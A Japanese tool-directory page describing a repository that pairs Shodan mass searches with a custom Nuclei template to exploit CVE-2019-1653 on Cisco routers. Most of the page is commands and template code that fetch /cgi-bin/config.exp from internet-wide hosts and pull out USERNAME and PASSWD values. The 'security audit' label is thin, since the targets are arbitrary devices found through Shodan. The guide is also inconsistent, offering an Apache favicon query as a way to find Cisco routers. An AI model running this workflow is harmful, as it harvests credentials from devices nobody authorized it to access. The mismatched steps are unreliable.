Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
nuclei-CiscoRV320Dump-CVE-2019-1653 — Ciscoルータ設定露出(CVE-2019-1653)を検出・悪用する自動化NucleiテンプレートとShodanワークフロー。セキュリティ監査用です。 | Kitploit
ツール/GitHubGitHub/elzerjp/nuclei-ciscorv320dump-cve-2019-1653
OSINT (オープンソースインテリジェンス)偵察脆弱性スキャナーエクスプロイトウェブアプリケーション悪用情報収集
GitHubelzerjp/nuclei-ciscorv320dump-cve-2019-1653

nuclei-CiscoRV320Dump-CVE-2019-1653

Ciscoルータ設定露出(CVE-2019-1653)を検出・悪用する自動化NucleiテンプレートとShodanワークフロー。セキュリティ監査用です。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
481年前未レビュー

Ciscoルーター設定露出の脆弱性 脆弱性の説明

このリポジトリは、特定のCiscoルーターにおいて、公開URLを介してconfig.exp設定ファイルが露出する脆弱性の悪用プロセスを詳述しています。このファイルには、認証情報(USERNAMEやPASSWD)、ネットワーク設定、その他システムの重要な詳細などの機密情報が含まれる可能性があります。認証なしでアクセス可能な場合、デバイスとそれが展開されているネットワークのセキュリティを危険にさらす可能性があります。 関連CVE

この脆弱性はCVE-2003-1567およびCVE-2019-1653に関連する可能性があります。どちらもCiscoデバイスにおける設定ファイルの不正な露出に関連していますが、特定のデバイスとファームウェアがこれらのCVEに該当するかどうかを調査することが重要です。 悪用のためのステップバイステップガイド

この手順では、Shodanを使用して脆弱なデバイスを特定し、その後Nucleiを使用してCiscoルーターの重要な設定の露出をスキャンおよび確認します。 前提条件

  • Shodanアカウント: Shodanアカウントを持ち、コマンドラインからアクセスできるようにAPIキーが設定されていることを確認してください。
  • Nuclei: 環境にインストールされていること、および以下で説明するカスタムNucleiテンプレートと共に使用します。
  • ツール: IPアドレスを完全なURLに変換するためのshodan-cli、awk、httpx。

ステップ1: Shodanで脆弱なデバイスを検索

最初のステップは、高度な検索を使用してShodanで脆弱なデバイスを特定することです。次のShodanクエリは、Ciscoルーターの可能性があるデバイスを検索します。

shodan download apache_results.json.gz "http.favicon.hash:-299287097 Apache"

このコマンド:

  • Shodanで検索を実行し、Apacheファビコンを持つデバイスを特定します。特定のハッシュはApacheに関連する可能性のあるサーバーを識別します。これはサーバー監査の文脈で役立ちます。

ステップ2: 結果をダウンロードしURLをフォーマット

apache_results.json.gzファイルを取得したら、各デバイスのIPアドレスとポートを抽出し、プロトコル(httpまたはhttps)とポートを含む完全なURLにフォーマットします。 .jsonファイルのデータを処理するコマンド

次のコマンドを使用して、IPアドレスとポートを抽出し、urls.txtというファイルに完全なURLをフォーマットします。

shodan parse --fields ip_str,port,ssl.version apache_results.json.gz |
awk '{if ($2 == 443 || $3 ~ /https/) print "https://"$1":"$2; else print "http://"$1":"$2}' > urls.txt

  • shodan parse: apache_results.json.gzファイル内の各結果からIPアドレスとポートを抽出します。
  • awk: 出力を完全なURLにフォーマットし、ポートが443またはSSLが検出された場合はhttps、それ以外の場合はhttpを使用します。

urls.txtファイルには、フォーマットされた完全なURLが含まれています。 ステップ3: カスタムNucleiテンプレートを作成

これらのデバイスでconfig.expファイルにアクセスできるかどうかを確認するために、カスタムNucleiテンプレートを使用します。このテンプレートはファイルにアクセスを試み、USERNAMEやPASSWDなどの機密データが存在する場合は抽出します。 Nucleiテンプレート (cisco-router-config-exposure.yaml)

id: cisco-router-config-exposure info: name: Cisco Router Configuration Exposure author: elzer severity: high description: | Detecta la exposición del archivo config.exp en routers Cisco que contiene credenciales y configuraciones críticas.

tags:

  • cisco
  • router
  • vulnerability
  • cgi-bin
  • config.exp

requests:

  • method: GET path:

    • "{{BaseURL}}/cgi-bin/config.exp"

    matchers-condition: or matchers:

    • type: word words:
      • "Cisco"
      • "config"
      • "version"
    • type: regex regex:
      • "USERNAME=\w+"
      • "PASSWD=[a-f0-9]{32}"

このテンプレートは:

  • /cgi-bin/config.expファイルにGETリクエストを送信します。
  • 応答に特定のキーワードまたはパターン(Cisco、config、version)が含まれているかどうかを確認し、露出を確認します。
  • ファイルにUSERNAMEとPASSWDの値が存在する場合に抽出を試みます。

このテンプレートをNucleiテンプレートフォルダにcisco-router-config-exposure.yamlとして保存します。 ステップ4: Nucleiを実行して脆弱なデバイスを検出

テンプレートとurls.txtファイルの準備ができたら、次のNucleiコマンドを実行してURLをスキャンします。

nuclei -t path/to/cisco-router-config-exposure.yaml -l urls.txt -o resultados_nuclei.txt -debug -vv

  • -t path/to/cisco-router-config-exposure.yaml: 作成したカスタムテンプレートを指定します。
  • -l urls.txt: フォーマットされたURLを含むurls.txtファイルを使用します。
  • -o resultados_nuclei.txt: 結果をresultados_nuclei.txtファイルに保存します。
  • -debug -vv: Nucleiを詳細モードで実行し、進行状況とデバッグの詳細を表示します。

結果

Nucleiの実行後、resultados_nuclei.txtファイルには、config.exp設定ファイルを露出している脆弱なデバイスのリストが含まれます。これには、認証情報や機密設定を返すデバイスが含まれ、脆弱性の露出が確認されます。 結論

このプロセスにより、ShodanとNucleiを使用してCiscoデバイス上の重要な設定ファイルの露出を特定および確認できます。このフローの自動化は、企業ネットワークにおける安全でない設定を特定して是正することに関心のあるセキュリティ監査人やサイバーセキュリティ専門家にとって特に有用です。

ツールをダウンロード